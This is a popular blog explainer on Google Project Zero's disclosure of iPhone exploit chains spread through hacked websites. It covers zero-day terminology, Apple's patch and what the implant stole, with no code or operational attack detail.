The iPhone Hack: What you need to know
A few days ago, one of Google’s security teams called Project Zero revealed a chilling and truly massive hack of Apple’s iPhone that has been going on for at least two years. Using the phone’s “God-mode”, everything could be accessed, even encrypted messages. Encryption wasn’t broken. The messages were simply taken, unencrypted, straight from the user’s screen. And users were tracked by GPS with their locations recorded once a minute.
What happened?
Google’s Project Zero is staffed by a team of security experts whose job is to find zero-day exploits in computer code. And ... I’ve probably lost you already. A what-day exploit?
OK, let’s backtrack a second. Computers start counting from zero, not one, so zero is as low as you can go. In computer jargon, “Day Zero” is the first day of anything – the start of a new project, the public release of a new app, or the very first day a company becomes aware of a weakness in their software that might be exploited by hackers. The more days that elapse after Day Zero, the less useful the exploit becomes – because the company has a chance to patch the flaw and users have a chance to download the fix. So a zero-day exploit is one that not even the company concerned is aware of. The only people who know about it are the people who discovered it, and if this happens to be a group of hackers ... well, it’s party time! Think of zero-day exploits as being gold nuggets encrusted with diamonds and dipped in chocolate and you’ll get the idea.
The Project Zero team have a policy of “responsible disclosure”. When they find a software vulnerability, they inform the manufacturer, then usually give them 90 days to fix the bug before making the details public. In this case, presumably because the researchers found not just one but a total of 14 vulnerabilities, they informed Apple on 1 February 2019 and gave the company a 7-day deadline full disclosure. This resulted in the surprise release of iOS 12.1.4 on 7 February along with Apple’s public disclosure of the weakness – though you might be excused for not having noticed. The security update concerned lists four fixes, with this as number two:
Foundation
Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.
Impact: An application may be able to gain elevated privileges.
Description: A memory corruption issue was addressed with improved input validation.
CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero
Anatomy of the attack
The whole thing might have been brushed under the carpet – as many of these cock-ups often are – except that the Project Zero team have been investigating mechanism and methods used by the hackers over the last few months. On 29 August, they published their findings in a post called A very deep dive into iOS Exploit chains found in the wild and brought the whole embarrassing mess to light. This post is a mere introduction to the seven that follow – it’s a deep dive indeed – but here, in summary, is what we know ...
• For at least two years, someone has been indiscriminately hacking thousands – and possibly millions – of iPhones.
• The hack took advantage of 14 security flaws in the iPhone.
• The hack occurred when users visited certain websites. Just visiting one of these websites was enough. No further interaction was needed; no downloads, no sign-ups, no clicking on “I agree to your cookie policy” messages, just a visit.
• Details of which websites were involved has not yet been disclosed.
• A visit to one of these sites would see the hackers’ monitoring software implanted in the device.
• Shutting down and restarting the phone would clear the software, but revisiting the website would reinfect it again.
Once infected:
... the implant [runs] in the background as root [ie: “God mode”.]. There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system.
The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds.
(My italics. Source.)
What was accessed?
In short, pretty much everything.
Encrypted files: The implant had access to all database files using popular encrypting apps like Whatsapp, Telegram and iMessage. The stolen content contained the unencrypted, plain-text of the messages sent and received. There was no need to break the encryption. Unencrypted messages were taken from the phone’s screen.
Email and private messages: All Gmail messages and conversations on Google Hangouts were uploaded by the implant.
Contacts: The implant took copies of the user’s complete contacts database.
Photos: Yep, them too.
GPS tracking: If the device was online, the implant uploaded the user’s location once per minute.
Keychain: A device’s keychain contains a huge number of credentials and certificates used by the device. For example, if your phone connects to your home Wi-Fi network, the SSID and password for it are stored in the keychain to save you having to re-enter them each time you get home. The keychain also contains tokens used by services such as Google's Single-Sign-On that enables Google apps to access the user's account. By uploading these, the attackers could then use them to maintain access to the user’s account, even once the implant was no longer running!
Whodunnit?
The implications are huge. The fact that this attack used 14 zero-day exploits and went undetected by for at least two years is a massive slap in the face for Apple, and the iPhone’s reputation as being secure and virtually unhackable is in tatters. What’s more, in the words of Project Zero’s Ian Beer, this attack shows “the capability to target and monitor the private activities of entire populations in real time.”
So whodunnit? We don’t know yet. Google hasn't released details of the malicious servers involved or where they were hosted, but the number of exploits used and the sheer scale of the attack suggests a state sponsor. "To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group."
Twenty years ago, if I’d suggested that in the future everyone would carry a personal tracker that gave governments, corporations and malicious individuals access to all our movements, private communications, contacts and photograph albums there’d have been outrage. Now we rush out and buy them and boast about them to our friends.
What can iPhone users do?
It’s a two-step process:
1. Make sure you have the very latest security update. Go here.
2. Pray Apple haven't fucked up again.
Given the increasing sophistication of these attacks, that’s about all you can do. Apart from switching the damn thing off.